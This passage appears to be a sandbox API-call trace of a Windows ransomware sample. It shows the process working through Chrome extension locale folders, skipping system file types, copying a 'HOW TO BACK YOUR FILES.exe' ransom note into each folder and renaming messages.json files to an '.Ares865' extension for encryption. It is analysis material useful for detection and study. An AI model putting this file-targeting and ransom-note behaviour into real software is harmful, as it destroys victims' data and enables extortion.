[0100.612] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.612] lstrlenW (lpString=".lnk") returned 4 [0100.612] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.612] lstrlenW (lpString=".ini") returned 4 [0100.612] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.612] lstrlenW (lpString=".sys") returned 4 [0100.612] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.612] lstrlenW (lpString="messages.json") returned 13 [0100.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.Ares865") returned 169 [0100.613] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16495) returned 1 [0100.619] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0100.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da" [0100.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.620] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.620] GetLastError () returned 0x0 [0100.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83425f30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e207b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e207b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.620] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.620] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.620] lstrlenW (lpString="messages.json") returned 13 [0100.620] lstrlenW (lpString="Ares865") returned 7 [0100.620] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.620] lstrlenW (lpString=".dll") returned 4 [0100.621] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.621] lstrlenW (lpString=".lnk") returned 4 [0100.621] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.621] lstrlenW (lpString=".ini") returned 4 [0100.621] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.621] lstrlenW (lpString=".sys") returned 4 [0100.621] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.621] lstrlenW (lpString="messages.json") returned 13 [0100.621] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.Ares865") returned 169 [0100.621] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.623] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16249) returned 1 [0100.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0100.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs" [0100.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.628] GetLastError () returned 0x0 [0100.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83419be0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e207b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e207b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.628] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.628] lstrlenW (lpString="messages.json") returned 13 [0100.628] lstrlenW (lpString="Ares865") returned 7 [0100.628] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.628] lstrlenW (lpString=".dll") returned 4 [0100.628] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.628] lstrlenW (lpString=".lnk") returned 4 [0100.628] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.628] lstrlenW (lpString=".ini") returned 4 [0100.629] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.629] lstrlenW (lpString=".sys") returned 4 [0100.629] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.629] lstrlenW (lpString="messages.json") returned 13 [0100.629] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.Ares865") returned 169 [0100.629] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.633] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16425) returned 1 [0100.637] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0100.637] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca" [0100.637] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.637] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.638] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.638] GetLastError () returned 0x0 [0100.638] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340ffa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e207b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e207b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.638] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.638] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.639] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.639] lstrlenW (lpString="messages.json") returned 13 [0100.639] lstrlenW (lpString="Ares865") returned 7 [0100.639] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.639] lstrlenW (lpString=".dll") returned 4 [0100.639] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.639] lstrlenW (lpString=".lnk") returned 4 [0100.639] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.639] lstrlenW (lpString=".ini") returned 4 [0100.639] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.639] lstrlenW (lpString=".sys") returned 4 [0100.639] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.639] lstrlenW (lpString="messages.json") returned 13 [0100.639] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.Ares865") returned 169 [0100.639] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.641] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16477) returned 1 [0100.644] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0100.644] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0100.644] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.644] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.645] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.645] GetLastError () returned 0x0 [0100.645] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.645] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340b180, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e22dce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e22dce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.645] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.646] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.646] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.646] lstrlenW (lpString="messages.json") returned 13 [0100.646] lstrlenW (lpString="Ares865") returned 7 [0100.646] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.646] lstrlenW (lpString=".dll") returned 4 [0100.646] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.646] lstrlenW (lpString=".lnk") returned 4 [0100.646] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.646] lstrlenW (lpString=".ini") returned 4 [0100.646] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.646] lstrlenW (lpString=".sys") returned 4 [0100.646] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.646] lstrlenW (lpString="messages.json") returned 13 [0100.646] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.Ares865") returned 169 [0100.646] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local 